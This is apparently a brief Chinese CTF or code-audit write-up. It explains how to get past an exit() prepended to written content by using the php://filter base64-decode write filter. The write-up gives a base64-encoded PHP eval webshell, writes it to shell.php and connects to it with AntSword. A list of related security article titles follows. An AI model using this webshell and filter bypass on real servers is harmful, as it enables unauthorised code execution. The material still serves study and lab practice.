代码审计,发现写进去的东西会加上exit,这样的话后面的内容就不能执,那就写个过滤器进行绕过,重点是考虑一下base64的解码位置,构造一句话木马,
使用base64的话
<?php eval($_POST['a']);
Base64 编码后:PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7
需要给前面随便补充一位,过滤器是php://filter/write=convert.base64-decode/resource=shell.php
写入成功后用蚁剑连接
相关推荐
cipher1 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"一次旅行4 天前
网络安全总结red1giant_star4 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)ZeroNews内网穿透4 天前
谷歌封杀OpenClaw背后:本地部署或是出路一名优秀的码农4 天前
vulhub系列-14-Os-hackNos-1(超详细)Libraeking4 天前
05 安全边界:MCP Server 的权限沙箱与敏感数据保护努力的lpp4 天前
SQLMap CTF 常用命令全集龙仔7254 天前
在麒麟V10服务器安全加固,sshd防暴力破解加固,实现“密码错误3次封IP”的需求努力的lpp4 天前
SQL 报错注入上海云盾-小余4 天前
即时通讯App的DDoS防御架构设计